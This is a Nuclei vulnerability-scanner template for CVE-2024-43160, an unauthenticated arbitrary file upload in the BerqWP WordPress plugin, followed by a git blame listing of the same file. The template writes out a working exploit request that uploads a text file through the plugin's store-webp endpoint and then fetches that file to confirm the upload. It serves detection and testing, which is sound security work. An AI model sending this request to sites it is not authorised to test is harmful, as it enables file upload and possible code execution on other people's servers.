nuclei-templates/http/cves/2024/CVE-2024-43160.yaml

id: CVE-2024-43160

info:
  name: BerqWP <= 1.7.6 - Arbitrary File Uplaod
  author: s4e-io
  severity: critical
  description: |
    The BerqWP Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the /api/store_webp.php file in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
  reference:
    - https://github.com/KTN1990/CVE-2024-43160
    - https://nvd.nist.gov/vuln/detail/CVE-2024-43160
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro/berqwp-176-unauthenticated-arbitrary-file-uplaod
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-43160
    cwe-id: CWE-434
    epss-score: 0.00043
    epss-percentile: 0.09608
  metadata:
    verified: true
    max-request: 3
    vendor: BerqWP
    product: BerqWP
    framework: wordpress
    publicwww-query: "/wp-content/plugins/searchpro"
  tags: cve,cve2024,file-upload,shell,intrusive,wp,wp-plugin,wordpress,searchpro

variables:
  filename: "{{rand_base(12)}}"
  num: "{{rand_int(10000000000, 999999999999999)}}"

flow: |
  http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/wp-content/plugins/searchpro")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-json/optifer/v1/store-webp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        image="{{base64(num)}}"&url={{filename}}.txt&license_key_hash=d41d8cd98f00b204e9800998ecf8427e

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"{{num}}")'
          - 'contains(content_type, "text/plain")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402207c3b763d8409c1f056f9231ff01d7446e814c8477f1fa382815f23bdd9b5cb9b02202119bdcb37c9b6eeed2059e458bda1e69c418623934db88f2277de567c6bdcb0:922c64590222798bb761d5b6d8e72950
add CVE-2024-43160 cvss: 10.0 2024-09-17 14:01:04 +00:00			`id: CVE-2024-43160`

			`info:`
Update CVE-2024-43160.yaml 2024-09-26 04:40:22 +00:00			`name: BerqWP <= 1.7.6 - Arbitrary File Uplaod`
add CVE-2024-43160 cvss: 10.0 2024-09-17 14:01:04 +00:00			`author: s4e-io`
			`severity: critical`
			`description: \|`
			`The BerqWP Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the /api/store_webp.php file in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.`
			`reference:`
			`- https://github.com/KTN1990/CVE-2024-43160`
			`- https://nvd.nist.gov/vuln/detail/CVE-2024-43160`
			`- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro/berqwp-176-unauthenticated-arbitrary-file-uplaod`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
			`cvss-score: 10`
			`cve-id: CVE-2024-43160`
			`cwe-id: CWE-434`
			`epss-score: 0.00043`
			`epss-percentile: 0.09608`
			`metadata:`
			`verified: true`
			`max-request: 3`
			`vendor: BerqWP`
			`product: BerqWP`
			`framework: wordpress`
			`publicwww-query: "/wp-content/plugins/searchpro"`
Update CVE-2024-43160.yaml 2024-09-26 04:40:22 +00:00			`tags: cve,cve2024,file-upload,shell,intrusive,wp,wp-plugin,wordpress,searchpro`
add CVE-2024-43160 cvss: 10.0 2024-09-17 14:01:04 +00:00
			`variables:`
			`filename: "{{rand_base(12)}}"`
			`num: "{{rand_int(10000000000, 999999999999999)}}"`

			`flow: \|`
			`http(1) && http(2) && http(3)`

			`http:`
			`- raw:`
			`- \|`
Update CVE-2024-43160.yaml 2024-09-26 04:40:22 +00:00			`GET / HTTP/1.1`
add CVE-2024-43160 cvss: 10.0 2024-09-17 14:01:04 +00:00			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
Update CVE-2024-43160.yaml 2024-09-26 04:40:22 +00:00			`- 'contains(body,"/wp-content/plugins/searchpro")'`
add CVE-2024-43160 cvss: 10.0 2024-09-17 14:01:04 +00:00			`- 'status_code == 200'`
			`condition: and`
			`internal: true`

			`- raw:`
			`- \|`
			`POST /wp-json/optifer/v1/store-webp HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`image="{{base64(num)}}"&url={{filename}}.txt&license_key_hash=d41d8cd98f00b204e9800998ecf8427e`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'contains(content_type,"application/json")'`
			`- 'status_code == 200'`
			`condition: and`
			`internal: true`

			`- raw:`
			`- \|`
			`GET /{{filename}}.txt HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'contains(body,"{{num}}")'`
			`- 'contains(content_type, "text/plain")'`
			`- 'status_code == 200'`
			`condition: and`
chore: sign templates 🤖 2024-10-04 11:39:38 +00:00			`# digest: 490a0046304402207c3b763d8409c1f056f9231ff01d7446e814c8477f1fa382815f23bdd9b5cb9b02202119bdcb37c9b6eeed2059e458bda1e69c418623934db88f2277de567c6bdcb0:922c64590222798bb761d5b6d8e72950`